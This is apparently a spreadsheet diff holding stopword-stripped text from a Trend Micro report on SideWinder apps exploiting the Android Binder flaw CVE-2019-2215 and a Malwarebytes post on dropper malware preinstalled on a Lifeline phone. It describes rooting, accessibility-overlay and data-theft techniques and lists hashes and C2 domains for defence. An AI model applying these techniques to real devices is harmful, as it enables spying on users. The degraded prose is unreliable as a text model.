corporate social responsibility learn leadership leadership learn experts experts learn internet safety cybersecurity education internet safety cybersecurity education learn legal legal learn investors investors learn formula racing formula racing learn latest news latest news latest news learn newsroom newsroom learn events events learn careers careers learn webinars webinars learn back back back back free trials contact looking home solutions attack alerts back unread props neom mclaren formula team paulo triumph proud cybersecurity partner close partnership predictions cloud close exploring cloud threats data poisoning machine learning data securing apis global trends geopolitical risks zero trust close trend micros chief technology strategy officer explores watch understanding generative means cybersecurity close actors fraud opportunities support business support portal business community virus help education certification contact support find support partner resources trend micro competition cyber risk indexassessment ciso resource center devops resource center encyclopedia cloud health assessment cyber insurance glossary terms webinars vision support partner portal cloud product activation management referral affiliate back arrowback search close content added folio folio close mobile first binder exploit linked sidewinder group found malicious apps work together compromise devices collect user data apps called camero exploits cve20192215 flaw exists binder first instance wild exploits said vulnerability ecular joseph chen january read time words save folio subscribe updated january video showing exploit cve20192215 found three malicious apps google play store work together compromise victim’s device collect user information apps called camero exploits cve20192215 vulnerability exists binder main interprocess communication system android first known active attack wild uses useafterfree vulnerability interestingly upon investigation also found three apps likely part sidewinder actor group’s arsenal sidewinder group active since known reportedly targeted military entities’ windows machines three malicious apps disguised photography file manager tools speculate apps active since march based certificate information apps apps since removed google play figure three apps related sidewinder group figure certificate information apps installation sidewinder installs payload stages first downloads file android file format command control server found group employs apps conversion tracking configure server address address encoded base64 referrer parameter used distribution malware figure parsed server address step downloaded file downloads file installs exploiting device employing accessibility done without user awareness intervention evade detection uses many techniques obfuscation data encryption invoking dynamic code apps camero filecrypt manger droppers downloading extra file server secondlayer droppers invoke extra code download install launch callcam device figure twostage payload deployment figure code showing dropper invokes extra code deploy payload callcam device without user’s awareness sidewinder following device rooting approach done dropper camero works google pixel pixel pixel nokia ta1032 lgh990 oppo cph1881 redmi devices malware retrieves specific exploit server depending downloaded dropper figure code snippet extra downloaded camero able download five exploits server investigation vulnerabilities cve20192215 mediateksu root privilege figure cve20192215 exploit figure mediateksu exploit acquiring root privilege malware installs callcam enables accessibility permission launches figure commands install launch enable accessibility device rooting approach used dropper filecrypt manager works typical android phones android launch asks user enable accessibility figure steps filecrypt manager prompts user granted shows full screen window says requires setup steps reality overlay screen displayed activity windows device overlay window sets attributions flagnotfocusable flagnottouchable allowing activity windows detect receive users’ touch events overlay screen figure overlay screen meanwhile invokes code extra file enable installation unknown apps installation payload callcam also enables payload app’s accessibility permission launches payload happens behind overlay screen unbeknownst user steps performed employing accessibility figure code enabling install unknown apps figure code enable accessibility permission newly installed video demonstrates payload deployment cve20192215 pixel ampampampampampnbsp callcam’s activities callcam hides icon device launched collects following information sends back server background location battery status files device installed list device information sensor information camera information screenshot account wifi information data wechat outlook twitter yahoo mail facebook gmail chrome encrypts stolen data using encryption algorithms uses sha256 verify data integrity customize encoding routine encrypting creates block data named headdata block contains first bytes origin data origin data length random rsaencrypted encrypt sha256 value aesencrypted origin data headdata encoded customized routine encoding stored head final encrypted file followed data aesencrypted original data figure data encryption process figure customized encoding routine done relation sidewinder apps attributed sidewinder servers uses suspected part sidewinder’s infrastructure addition linking apps’ google play pages also found servers figure google play filemanager found servers trend micro solutions trend micro solutions trend micro™ mobile android™ detect malicious apps users also benefit multilayered capabilities secure device owner’s data privacy safeguard ransomware fraudulent websites identity theft organizations trend micro mobile enterprise suite provides device compliance application management data protection configuration provisioning also protects devices attacks exploit vulnerabilities prevents unauthorized access apps detects blocks malware fraudulent websites trend micro’s mobile reputation service mars covers android threats using leading sandbox machine learning technologies protect users malware zeroday known exploits privacy leaks application vulnerabilities indicators compromise sha256 package namefile type namedetection name ec4d6bf06dd3f94f4555d75c6daaf540dee15b18d62cc004e774e996c703cb34 androidosswinderspyhrxa a60fc4e5328dc75dad238d46a2867ef7207b8c6fb73e8bd001b323b16f02ba00 androidosswinderspyhrxa 0daefb3d05e4455b590da122255121079e83d48763509b0688e0079ab5d48886 androidosmtksua 441d98dff3919ed24af7699be658d06ae8dfd6a12e4129a385754e6218bc24fa androidosbinderexpa ac82f7e4831907972465477eebafc5a488c6bb4d460575cd3889226c390ef8d5 androidosbinderexpa ee679afb897213a3fd09be43806a7e5263563e86ad255fd500562918205226b8 androidosbinderexpa 135cb239966835fefbb346165b140f584848c00c4b6a724ce122de7d999a3251 androidosmtksua a265c32ed1ad47370d56cbd287066896d6a0c46c80a0d9573d2bb915d198ae42 comcallcamandroidcallcam2base callcamm package namefile type namedetection name comabdulrauffilemanager filecrypt manager comcallcamandroidcallcam2base callcamm comcameroandroidcamera2basic camero servers msethicsnet debcnnet ap1aclnet sdbnet awschecknet reawknet mitre attck matrix™ tags mobile targeted attacks research authors ecular mobile threats analyst joseph chen researcher contact subscribe related articles agenda ransomware propagates vcenters esxi custom powershell script teamcity vulnerability exploits lead jasmin ransomware malware types jenkins args4j cve202423897 files exposed code risk articles services free days start free trial today resources blog newsroom reports devops resource center ciso resource center find partner support business support portal contact downloads free trials trend careers locations upcoming events trust center country headquarters trend micro united states east john carpenter freeway suite irving texas phone select country region expandmore close americas united states brasil canada méxico middle east africa south africa middle east north africa europe belgië belgium česká republika danmark deutschland österreich schweiz españa france ireland italia nederland norge norway polska poland suomi finland sverige sweden türkiye turkey united kingdom asia pacific australia центральная азия central asia hong kong english hong kong भारत गणराज्य india indonesia japan 대한민국 south korea malaysia монголия mongolia рузия georgia zealand philippines singapore taiwan ประเทศไทย thailand việt privacy legal accessibility site copyright ©2024 trend micro incorporated rights reserved sxpibdpekzi9pc2p0swmpusm2nsxwzpyxtmllbxmya0r20xk</t>
+          <t>Trend Micro found three malicious apps in the Google Play Store that work together to compromise devices and collect user information.</t>
         </is>
       </c>
       <c r="D131" t="inlineStr">
         <is>
           <t>https://www.trendmicro.com/en_us/research/20/a/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group.html</t>
-        </is>
-      </c>
-      <c r="E131" t="inlineStr">
-        <is>
-          <t>['business', 'search', 'close', 'solution', 'challenge', 'challenge', 'challenge', 'mitigate', 'risk', 'mitigate', 'risk', 'risk', 'posture', 'attack', 'surface', 'management', 'cloudnative', 'app', 'cloudnative', 'app', 'business', 'outcome', 'hybrid', 'world', 'hybrid', 'multicloud', 'world', 'visibility', 'meet', 'business', 'need', 'borderless', 'workforce', 'borderless', 'workforce', 'confidence', 'device', 'network', 'blind', 'spot', 'network', 'blind', 'spot', 'user', 'operation', 'environment', 'fast', 'fast', 'adversary', 'powerful', 'purposebuilt', 'attack', 'surface', 'risk', 'management', 'trust', 'capability', 'team', 'team', 'threat', 'effectiveness', 'proactive', 'risk', 'reduction', 'service', 'trust', 'trust', 'attack', 'surface', 'risk', 'real', 'time', 'policy', 'network', 'workload', 'device', 'single', 'console', 'role', 'role', 'role', 'ciso', 'ciso', 'business', 'value', 'measurable', 'cybersecurity', 'outcome', 'manager', 'manager', 'infrastructure', 'manager', 'infrastructure', 'manager', 'mitigate', 'threat', 'builder', 'developer', 'builder', 'developer', 'code', 'run', 'visibility', 'control', 'cloud', 'environment', 'industry', 'industry', 'industry', 'patient', 'datum', 'device', 'network', 'meeting', 'regulation', 'manufacturing', 'manufacturing', 'factory', 'environment', 'traditional', 'device', 'stateoftheart', 'infrastructure', 'icsot', 'utility', 'industry', 'electric', 'utility', 'electric', 'utility', 'electric', 'utility', 'federal', 'federal', 'automotive', 'automotive', 'network', 'network', 'small', 'midsized', 'business', 'small', 'midsized', 'business', 'threat', 'comprehensive', 'platform', 'vision', 'platform', 'vision', 'platform', 'trend', 'vision', 'platform', 'bridge', 'protection', 'cyber', 'risk', 'management', 'companion', 'trend', 'vision', 'companion', 'generative', 'cybersecurity', 'assistant', 'attack', 'surface', 'management', 'attack', 'surface', 'management', 'breach', 'extended', 'detection', 'response', 'detection', 'response', 'adversary', 'broad', 'perspective', 'well', 'context', 'hunt', 'respond', 'threat', 'single', 'platform', 'trend', 'vision', 'cloud', 'overview', 'cloud', 'platform', 'developer', 'team', 'business', 'attack', 'surface', 'risk', 'management', 'cloud', 'attack', 'surface', 'risk', 'management', 'vulnerability', 'prioritization', 'cloud', 'posture', 'management', 'attack', 'surface', 'management', 'visibility', 'investigation', 'workload', 'workload', 'secure', 'datum', 'center', 'cloud', 'container', 'performance', 'cloud', 'platform', 'capability', 'container', 'container', 'cloudnative', 'application', 'advanced', 'container', 'image', 'policybased', 'admission', 'control', 'container', 'runtime', 'protection', 'file', 'storage', 'file', 'storage', 'cloud', 'fileobject', 'storage', 'service', 'cloudnative', 'application', 'architecture', 'endpoint', 'endpoint', 'endpoint', 'overview', 'endpoint', 'stage', 'attack', 'endpoint', 'endpoint', 'adversary', 'broad', 'perspective', 'well', 'context', 'hunt', 'respond', 'threat', 'single', 'platform', 'workload', 'workload', 'prevention', 'detection', 'response', 'endpoint', 'server', 'cloud', 'workload', 'industrial', 'endpoint', 'industrial', 'endpoint', 'mobile', 'mobile', 'onpremise', 'application', 'mobile', 'threat', 'network', 'network', 'network', 'overview', 'power', 'network', 'detection', 'response', 'network', 'network', 'adversary', 'broad', 'perspective', 'well', 'context', 'hunt', 'respond', 'threat', 'single', 'platform', 'network', 'protect', 'unknown', 'undisclosed', 'vulnerability', 'network', 'breach', 'detection', 'system', 'breach', 'detection', 'system', 'targeted', 'attack', 'inbound', 'outbound', 'secure', 'service', 'edge', 'secure', 'service', 'edge', 'trust', 'secure', 'digital', 'transformation', 'continuous', 'risk', 'assessment', 'industrial', 'network', 'industrial', 'network', 'network', 'network', 'email', 'email', 'email', 'malware', 'fraud', 'attack', 'enterprise', 'email', 'collaboration', 'trend', 'vision', 'email', 'collaboration', 'stop', 'ransomware', 'attack', 'email', 'service', 'solution', 'adversary', 'broad', 'perspective', 'well', 'context', 'hunt', 'respond', 'threat', 'single', 'platform', 'industrial', 'network', 'industrial', 'network', 'industrial', 'network', 'industrial', 'endpoint', 'industrial', 'endpoint', 'intelligence', 'intelligence', 'late', 'threat', 'critical', 'datum', 'ongoing', 'prevention', 'analysis', 'product', 'service', 'trial', 'product', 'service', 'trial', 'research', 'research', 'research', 'research', 'research', 'news', 'perspective', 'research', 'news', 'perspective', 'research', 'analysis', 'research', 'analysis', 'news', 'news', 'initiative', 'initiative', 'service', 'service', 'service', 'service', 'service', 'package', 'service', 'package', 'augment', 'team', 'detection', 'response', 'support', 'augment', 'detection', 'detection', 'response', 'email', 'endpoint', 'server', 'cloud', 'workload', 'network', 'incident', 'response', 'incident', 'response', 'incident', 'response', 'expert', 'breach', 'plan', 'insurance', 'carrier', 'firm', 'insurance', 'carrier', 'firm', 'breach', 'good', 'response', 'detection', 'technology', 'market', 'client', 'downtime', 'claim', 'cost', 'support', 'service', 'support', 'service', 'partner', 'partner', 'program', 'partner', 'program', 'partner', 'program', 'overview', 'business', 'customer', 'service', 'provider', 'service', 'provider', 'modern', 'operation', 'service', 'service', 'provider', 'service', 'provider', 'partner', 'expert', 'cybersecurity', 'leverage', 'solution', 'msp', 'cloud', 'service', 'provider', 'service', 'provider', 'marketleading', 'cloud', 'service', 'offering', 'matter', 'platform', 'professional', 'service', 'professional', 'service', 'revenue', 'industryleading', 'reseller', 'reseller', 'possibility', 'marketplace', 'marketplace', 'system', 'system', 'integrator', 'alliance', 'partner', 'overview', 'work', 'performance', 'value', 'technology', 'alliance', 'partner', 'alliance', 'partner', 'alliance', 'partner', 'alliance', 'partner', 'partner', 'tool', 'partner', 'tool', 'partner', 'tool', 'partner', 'login', 'partner', 'login', 'login', 'education', 'certification', 'education', 'certification', 'partner', 'success', 'partner', 'success', 'distributor', 'distributor', 'partner', 'partner', 'company', 'trend', 'trend', 'customer', 'success', 'story', 'customer', 'success', 'story', 'human', 'connection', 'human', 'connection', 'industry', 'accolade', 'industry', 'accolade', 'strategic', 'alliance', 'strategic', 'alliance', 'trend', 'trend', 'trend', 'micro', 'trend', 'competition', 'crowdstrike', 'effective', 'cybersecurity', 'cloudnative', 'platform', 'pricing', 'budget', 'organization', 'costeffective', 'scalability', 'true', 'single', 'platform', 'foundational', 'layer', 'protection', 'supplemental', 'solution', 'customer', 'problem', 'network', 'advanced', 'cybersecurity', 'solution', 'comprehensive', 'unlocking', 'capability', 'significant', 'investment', 'trust', 'center', 'trust', 'center', 'history', 'history', 'diversity', 'equity', 'equity', 'inclusion', 'corporate', 'social', 'responsibility', 'corporate', 'social', 'responsibility', 'leadership', 'leadership', 'expert', 'expert', 'internet', 'safety', 'cybersecurity', 'education', 'internet', 'safety', 'cybersecurity', 'education', 'legal', 'legal', 'investor', 'investor', 'formula', 'racing', 'formula', 'racing', 'late', 'news', 'late', 'news', 'late', 'news', 'newsroom', 'newsroom', 'event', 'event', 'career', 'career', 'webinar', 'webinar', 'free', 'trial', 'home', 'solution', 'unread', 'prop', 'team', 'proud', 'cybersecurity', 'partner', 'close', 'partnership', 'prediction', 'close', 'cloud', 'threat', 'datum', 'poisoning', 'machine', 'datum', 'apis', 'global', 'trend', 'geopolitical', 'risk', 'trust', 'close', 'trend', 'micro', 'chief', 'technology', 'strategy', 'officer', 'watch', 'generative', 'mean', 'cybersecurity', 'close', 'actor', 'fraud', 'opportunity', 'business', 'support', 'portal', 'business', 'community', 'virus', 'education', 'certification', 'contact', 'support', 'support', 'partner', 'resource', 'micro', 'competition', 'cyber', 'indexassessment', 'ciso', 'resource', 'center', 'resource', 'center', 'assessment', 'cyber', 'insurance', 'glossary', 'term', 'vision', 'support', 'partner', 'portal', 'product', 'activation', 'management', 'referral', 'affiliate', 'arrowback', 'search', 'close', 'content', 'folio', 'folio', 'mobile', 'first', 'binder', 'exploit', 'sidewinder', 'group', 'malicious', 'app', 'compromise', 'device', 'user', 'datum', 'app', 'cve20192215', 'binder', 'first', 'instance', 'wild', 'exploit', 'vulnerability', 'ecular', 'time', 'word', 'folio', 'video', 'malicious', 'app', 'google', 'play', 'store', 'work', 'compromise', 'victim', 'device', 'user', 'information', 'app', 'cve20192215', 'vulnerability', 'binder', 'main', 'interprocess', 'communication', 'system', 'active', 'attack', 'wild', 'useafterfree', 'vulnerability', 'investigation', 'app', 'likely', 'part', 'sidewinder', 'actor', 'group', 'arsenal', 'sidewinder', 'group', 'active', 'military', 'entity', 'window', 'machine', 'malicious', 'app', 'photography', 'file', 'manager', 'tool', 'app', 'active', 'certificate', 'information', 'app', 'app', 'play', 'figure', 'app', 'sidewinder', 'group', 'figure', 'certificate', 'information', 'app', 'installation', 'sidewinder', 'payload', 'stage', 'download', 'file', 'format', 'command', 'group', 'app', 'conversion', 'configure', 'server', 'address', 'address', 'base64', 'parameter', 'distribution', 'malware', 'figure', 'server', 'address', 'step', 'file', 'download', 'file', 'install', 'device', 'accessibility', 'user', 'awareness', 'intervention', 'detection', 'many', 'technique', 'obfuscation', 'datum', 'encryption', 'dynamic', 'code', 'app', 'filecrypt', 'manger', 'extra', 'file', 'server', 'secondlayer', 'extra', 'code', 'download', 'launch', 'callcam', 'device', 'figure', 'twostage', 'payload', 'deployment', 'figure', 'code', 'dropper', 'extra', 'code', 'payload', 'callcam', 'device', 'user', 'awareness', 'sidewinder', 'device', 'rooting', 'approach', 'dropper', 'work', 'pixel', 'pixel', 'nokia', 'oppo', 'cph1881', 'device', 'specific', 'exploit', 'server', 'dropper', 'figure', 'code', 'snippet', 'downloaded', 'able', 'exploit', 'server', 'investigation', 'figure', 'cve20192215', 'exploit', 'figure', 'root', 'privilege', 'malware', 'callcam', 'accessibility', 'permission', 'launch', 'figure', 'command', 'launch', 'accessibility', 'device', 'approach', 'dropper', 'filecrypt', 'manager', 'typical', 'phone', 'user', 'accessibility', 'figure', 'step', 'filecrypt', 'manager', 'user', 'full', 'screen', 'window', 'setup', 'step', 'reality', 'overlay', 'screen', 'activity', 'window', 'device', 'overlay', 'window', 'set', 'attribution', 'flagnotfocusable', 'flagnottouchable', 'activity', 'window', 'user', 'touch', 'event', 'overlay', 'screen', 'figure', 'overlay', 'screen', 'code', 'extra', 'file', 'installation', 'unknown', 'app', 'installation', 'payload', 'app', 'accessibility', 'permission', 'payload', 'overlay', 'screen', 'unbeknownst', 'user', 'step', 'accessibility', 'figure', 'code', 'install', 'unknown', 'app', 'figure', 'code', 'accessibility', 'permission', 'video', 'payload', 'deployment', 'cve20192215', 'activity', 'callcam', 'icon', 'device', 'collect', 'information', 'server', 'background', 'location', 'battery', 'status', 'device', 'list', 'device', 'information', 'sensor', 'information', 'camera', 'information', 'screenshot', 'account', 'wifi', 'information', 'datum', 'wechat', 'outlook', 'twitter', 'mail', 'facebook', 'gmail', 'chrome', 'datum', 'encryption', 'algorithm', 'datum', 'integrity', 'customize', 'routine', 'encrypting', 'block', 'datum', 'block', 'first', 'byte', 'origin', 'datum', 'origin', 'datum', 'length', 'random', 'origin', 'datum', 'head', 'final', 'file', 'datum', 'original', 'data', 'figure', 'datum', 'encryption', 'process', 'figure', 'encoding', 'routine', 'relation', 'sidewinder', 'app', 'sidewinder', 'server', 'part', 'sidewinder', 'infrastructure', 'addition', 'app', 'play', 'page', 'server', 'server', 'micro', 'solution', 'micro', 'solution', 'micro', '™', 'mobile', 'malicious', 'app', 'user', 'multilayered', 'capability', 'device', 'owner', 'datum', 'privacy', 'ransomware', 'fraudulent', 'website', 'identity', 'theft', 'organization', 'trend', 'mobile', 'enterprise', 'suite', 'device', 'compliance', 'application', 'management', 'datum', 'protection', 'configuration', 'provisioning', 'device', 'attack', 'vulnerability', 'unauthorized', 'access', 'app', 'block', 'fraudulent', 'website', 'micro', 'mobile', 'reputation', 'service', 'android', 'threat', 'sandbox', 'machine', 'learning', 'technology', 'user', 'privacy', 'leak', 'application', 'vulnerability', 'indicator', 'package', 'namefile', 'type', 'namedetection', 'name', 'androidosswinderspyhrxa', 'namefile', 'type', 'namedetection', 'name', 'manager', 'server', 'matrix', '™', 'tag', 'mobile', 'attack', 'research', 'author', 'ecular', 'mobile', 'threat', 'analyst', 'contact', 'article', 'agenda', 'vcenter', 'esxi', 'teamcity', 'vulnerability', 'file', 'code', 'risk', 'article', 'service', 'free', 'day', 'free', 'trial', 'today', 'resource', 'blog', 'report', 'resource', 'center', 'ciso', 'resource', 'center', 'partner', 'support', 'business', 'support', 'portal', 'contact', 'free', 'trial', 'career', 'location', 'upcoming', 'event', 'center', 'country', 'headquarters', 'phone', 'select', 'country', 'region', 'close', 'legal', 'accessibility', 'site', 'copyright', 'incorporated', 'right', 'sxpibdpekzi9pc2p0swmpusm2nsxwzpyxtmllbxmya0r20xk']</t>
         </is>
       </c>
     </row>
@@ -3856,17 +3346,12 @@
       </c>
       <c r="C132" t="inlineStr">
         <is>
-          <t>skip content search search malwarebytescom search contact personal support business support quote contact press partner programs submit vulnerability company malwarebytes careers news press sign myaccount sign manage personal teams subscription cloud console sign manage cloud business products partner portal sign management resellers msps personal personal products malwarebytes premium malwarebytes privacy malwarebytes identity theft protection malwarebytes browser guard malwarebytes teamssmall offices adwcleaner windows find right product plans infected already clean device solutions free antivirus free virus scan removal windows antivirus antivirus android antivirus chromebook antivirus digital footprint scan personal pricing manage subscription visit support page business business bundles threatdown bundles protect endpoints powerfully simple costeffective bundles education bundles secure students institution cyberattacks technology highlights managed detection response deploy fullymanaged monitoring investigation remediation endpoint detection response prevent attacks catches others miss explore portfolio visualize optimize posture minutes learn advisor available every bundle pricing pricing personal pricing protect personal devices data small officehome office pricing protect team’s devices data business pricing employees step corporate endpoint save partners partners explore partnerships partner solutions resellers managed service providers computer repair technology partners affiliate partners contact resources resources learn cybersecurity antivirus malware ransomware malwarebytes labs blog glossary center business resources reviews analyst reports case studies press news reports state malware report read report support support technical support personal support business support premium services forums vulnerability disclosure report false positive featured content activate malwarebytes privacy windows device content product videos free download search search search malwarebytescom search subscribe android news united states governmentfunded phones come preinstalled unremovable malware posted january nathan collier update july months publishing first investigation governmentfunded mobile phones contacted concerned user device—the ul40 thorough investigation found preinstalled malware update february writing unimax communications officially removed preinstalled malware u683cl latest update software resolves issues please keep mind infected androidtrojanhiddenadswract still need remove although play protect offer prompt calling unsafe warning users uninstall malwarebytes android also detect remove hiddenads we’d like thank unimax communications resolving issue despite fact still refuse take ownership back january gave public statement investigating issue unimax communications determined applications described posting malware reviewing applications however unimax communications determined potential vulnerability settings library unimax communications updated software correct potential vulnerability unimax communications’ knowledge customer data compromised convenient happened find “vulnerabilities” preinstalled settings happened dropping malware stand original assertion malicious trojan dropper capabilities—the dropping hiddenads trojan device indisputable main goal post inform protect users malwarebytes customers importantly brought issue press order invoke resolution option available customers therefore although we’re glad unimax took action users could safely devices disappointed took public action find resolution first place update january time original publication able replicate malware androidtrojanhiddenads dropped test device though multiple users reported variant hiddenads suddenly installed mobile phone today able report u683cl test phone become infected variant hiddenads detect androidtrojanhiddenadswract variant observed wild since spring runs silently background create icon evidence running background seen mobile device’s notifications notification changes title name highlighted notification cannot swiped notifications stubbornly remains running background fortunately find uninstall press hold notification give option settings clicking settings take app’s notification settings press app’s icon lastly take app’s info uninstall course malwarebytes android takes care well united states–funded mobile carrier offers phones lifeline assistance program selling mobile device preinstalled nefarious applications assurance wireless virgin mobile offers u683cl phone budget conscious option governmentfunded program it’s attractive offering however comes installed appalling malicious preinstalled october several complaints support system users governmentissued phone reporting preinstalled apps malicious purchased u683cl better assist customers verify claims informed assurance wireless findings asked point blank usfunded mobile carrier selling mobile device infected preinstalled malware giving adequate time respond unfortunately never heard back here’s discovered first questionable found u683cl poses updater named wireless update capable updating mobile device fact it’s update mobile device’s operating system conversely also capable autoinstalling apps without user consent thus detect androidpupriskwareautoinsfotafbcvd detection name sound familiar malwarebytes android customers that’s actually variant adups chinabased company caught collecting user data creating backdoors mobile devices developing autoinstallers moment mobile device wireless update starts autoinstalling apps repeat user consent collected buttons click accept installs installs apps apps installs initially clean free malware it’s important note apps added device zero notification permission required user opens potential malware unknowingly installed future update apps added wireless update time preinstalled unremovable it’s great frustration must write another unremovable preinstalled found u683cl phone mobile device’s settings functions heavilyobfuscated malware detect androidtrojandropperagentumx serves dashboard settings changed removing would leave device unusable androidtrojandropperagentumx shares characteristics variants known mobile trojan droppers first characteristic uses receiver service names receiver name ends alreceiver service name ends alajobservice names alone generic make solid correlation coupled fact code almost identical confidently confirm match difference codes variable names discernible variant malware uses chinese characters variable names therefore assume origin malware china second characteristic shares containing encoded string within code decoding string reveals hidden library file named comandroidgooglebridgelibimp let’s take time look code flows decoding comandroidgooglebridgelibimp first grabs encoded string decodes using base64 decoding loads decoded library memory using dexclassloader library loaded memory drops another piece malware known androidtrojanhiddenads although reproduce dropping additional malware users reported indeed variant hiddenads suddenly installs mobile device malware origin addition malware chinese origin it’s noteworthy mention mobile device made chinese company well could simply coincidence rather explicit malcontent—we cannot confirm makers device aware chinese malware preinstalled current resolution although uninstall preinstalled apps current malwarebytes users consequences uninstall wireless update could missing critical updates think that’s worth tradeoff suggest uninstall settings made pricey paper weight offer attempt remediate preinstalled malware blog landscape preinstalled mobile malware malicious code within section attempting remediate preinstalled malware getting worse foreshadowed highlighted blog blogs past preinstalled malware continues scourge users mobile devices there’s mobile device available purchase governmentfunded program henceforth raises lowers however view behavior development companies budget dictate whether user remain safe mobile device shell thousands iphone escape preinstalled maliciousness governmentassisted funding purchase device price malware that’s type malwarefree existence envision malwarebytes final words u683cl actual u683cl hands tell phone feels solid hand runs smoothly sure it’s fastest mobile device it’s fully capable smart phone general without malware device good option anyone budget it’s important realize isn’t alone many reports budget manufactures coming preinstalled malware reports increasing number although don’t answer widespread issue citizens using lifeline assistance program many others tight budget deserve stay safe correction earlier version blog listed model u686cl correct model u683cl apologize confusion share article related articles news disturbing robocaller fined million march robocaller spoofed local phone number presented targets inflammatory disturbing content received hefty fine continue reading comments news meta abandon social media tracking tool crowdtangle march meta retire social media tracking tool crowdtangle august awkward timing given amount important elections year continue reading comments exploits vulnerabilities news patch mozilla patches critical vulnerabilities firefox march mozilla released update firefox critical vulnerabilities together allowed attacker escape sandbox continue reading comments news privacy ransomware vans warns customers data breach march vans warns customers phishing fraud attacks aftermath ransomware attack december continue reading comments podcast securing home network long tiresome entirely worth carey parker lock code s05e07 march week lock code podcast speak carey parker importance process securing home network continue reading comments author nathan collier full time mobile malware researcher part time endurance athlete world traveler nerdy traveling mobile malware contributors center podcast glossary scams cyberprotection every personal windows antivirus antivirus android antivirus free antivirus devices malwarebytes company contact careers news press blog scholarship forums business small businesses midsize business larger enterprise endpoint protection endpoint detection response managed detection response partners managed service provider program resellers account sign solutions digital footprint scan rootkit scanner trojan scanner virus scanner spyware scanner password generator anti ransomware protection address albert quay floor cork x8n6 ireland freedom circle 12th floor santa clara learn malware hacking phishing ransomware computer virus antivirus twitter facebook linkedin youtube instagram cybersecurity info can’t live without want stay informed latest news cybersecurity sign newsletter learn protect computer threats email address english legal privacy accessibility compliance certifications vulnerability disclosure terms service rights reserved select language</t>
+          <t>A United States-funded mobile carrier that offers phones via the Lifeline Assistance program is selling a mobile device pre-installed with not one, but two nefarious applications.</t>
         </is>
       </c>
       <c r="D132" t="inlineStr">
         <is>
           <t>https://blog.malwarebytes.com/android/2020/01/united-states-government-funded-phones-come-pre-installed-with-unremovable-malware/</t>
-        </is>
-      </c>
-      <c r="E132" t="inlineStr">
-        <is>
-          <t>['content', 'search', 'search', 'search', 'contact', 'personal', 'support', 'business', 'support', 'contact', 'press', 'partner', 'program', 'vulnerability', 'company', 'career', 'news', 'press', 'sign', 'myaccount', 'sign', 'personal', 'team', 'subscription', 'sign', 'cloud', 'business', 'product', 'partner', 'portal', 'sign', 'management', 'reseller', 'msp', 'personal', 'personal', 'product', 'identity', 'office', 'adwclean', 'window', 'right', 'product', 'plan', 'clean', 'device', 'solution', 'free', 'footprint', 'personal', 'pricing', 'subscription', 'visit', 'support', 'page', 'business', 'business', 'bundle', 'threatdown', 'bundle', 'endpoint', 'simple', 'costeffective', 'bundle', 'education', 'bundle', 'student', 'institution', 'cyberattack', 'technology', 'highlight', 'detection', 'response', 'fullymanaged', 'monitoring', 'investigation', 'remediation', 'endpoint', 'detection', 'response', 'attack', 'other', 'portfolio', 'optimize', 'posture', 'minute', 'advisor', 'available', 'bundle', 'pricing', 'pricing', 'personal', 'pricing', 'personal', 'device', 'data', 'small', 'officehome', 'office', 'pricing', 'protect', 'team', 'device', 'data', 'business', 'pricing', 'employee', 'corporate', 'endpoint', 'partner', 'partner', 'partnership', 'partner', 'solution', 'reseller', 'service', 'provider', 'computer', 'repair', 'technology', 'partner', 'affiliate', 'partner', 'contact', 'resource', 'resource', 'cybersecurity', 'center', 'business', 'resource', 'review', 'analyst', 'case', 'study', 'news', 'report', 'support', 'support', 'technical', 'support', 'personal', 'support', 'business', 'support', 'premium', 'service', 'forum', 'vulnerability', 'disclosure', 'report', 'false', 'positive', 'content', 'malwarebyte', 'device', 'content', 'product', 'video', 'free', 'download', 'search', 'search', 'search', 'search', 'subscribe', 'governmentfunded', 'phone', 'unremovable', 'malware', 'month', 'first', 'investigation', 'mobile', 'phone', 'concerned', 'user', 'device', 'ul40', 'thorough', 'investigation', 'malware', 'update', 'communication', 'malware', 'u683cl', 'late', 'update', 'software', 'issue', 'mind', 'androidtrojanhiddenadswract', 'play', 'protect', 'offer', 'prompt', 'unsafe', 'warning', 'user', 'malwarebyte', 'remove', 'hiddenad', 'communication', 'issue', 'fact', 'ownership', 'public', 'statement', 'issue', 'communication', 'application', 'malware', 'reviewing', 'application', 'communication', 'potential', 'vulnerability', 'setting', 'library', 'software', 'potential', 'vulnerability', 'communication', 'knowledge', 'customer', 'datum', 'vulnerability', 'setting', 'original', 'assertion', 'malicious', 'trojan', 'dropper', 'capability', 'dropping', 'device', 'indisputable', 'main', 'goal', 'post', 'inform', 'user', 'malwarebyte', 'customer', 'issue', 'press', 'order', 'invoke', 'resolution', 'option', 'available', 'customer', 'glad', 'action', 'user', 'device', 'public', 'action', 'resolution', 'first', 'place', 'update', 'time', 'original', 'publication', 'able', 'malware', 'androidtrojanhiddenad', 'test', 'device', 'multiple', 'user', 'variant', 'hiddenad', 'mobile', 'phone', 'today', 'able', 'u683cl', 'test', 'phone', 'infected', 'variant', 'hiddenad', 'androidtrojanhiddenadswract', 'variant', 'wild', 'spring', 'run', 'background', 'icon', 'evidence', 'background', 'mobile', 'device', 'notification', 'notification', 'title', 'name', 'notification', 'notification', 'background', 'uninstall', 'press', 'notification', 'option', 'setting', 'clicking', 'setting', 'app', 'notification', 'setting', 'press', 'app', 'icon', 'app', 'info', 'uninstall', 'course', 'malwarebyte', 'care', 'mobile', 'carrier', 'phone', 'lifeline', 'assistance', 'program', 'mobile', 'device', 'nefarious', 'application', 'assurance', 'wireless', 'virgin', 'mobile', 'u683cl', 'phone', 'budget', 'conscious', 'option', 'program', 'attractive', 'offering', 'appalling', 'malicious', 'several', 'complaint', 'support', 'system', 'user', 'phone', 'reporting', 'app', 'malicious', 'u683cl', 'well', 'customer', 'claim', 'assurance', 'wireless', 'finding', 'point', 'mobile', 'carrier', 'mobile', 'device', 'malware', 'adequate', 'time', 'questionable', 'pose', 'wireless', 'update', 'capable', 'mobile', 'device', 'fact', 'update', 'mobile', 'device', 'operating', 'system', 'capable', 'app', 'user', 'consent', 'androidpupriskwareautoinsfotafbcvd', 'detection', 'name', 'sound', 'familiar', 'malwarebyte', 'customer', 'variant', 'adup', 'company', 'user', 'datum', 'backdoor', 'mobile', 'device', 'autoinstaller', 'mobile', 'device', 'wireless', 'update', 'app', 'user', 'consent', 'button', 'install', 'install', 'app', 'app', 'clean', 'free', 'malware', 'important', 'note', 'app', 'device', 'notification', 'permission', 'user', 'potential', 'malware', 'future', 'update', 'app', 'wireless', 'update', 'time', 'unremovable', 'great', 'frustration', 'unremovable', 'u683cl', 'phone', 'mobile', 'device', 'setting', 'function', 'malware', 'androidtrojandropperagentumx', 'dashboard', 'setting', 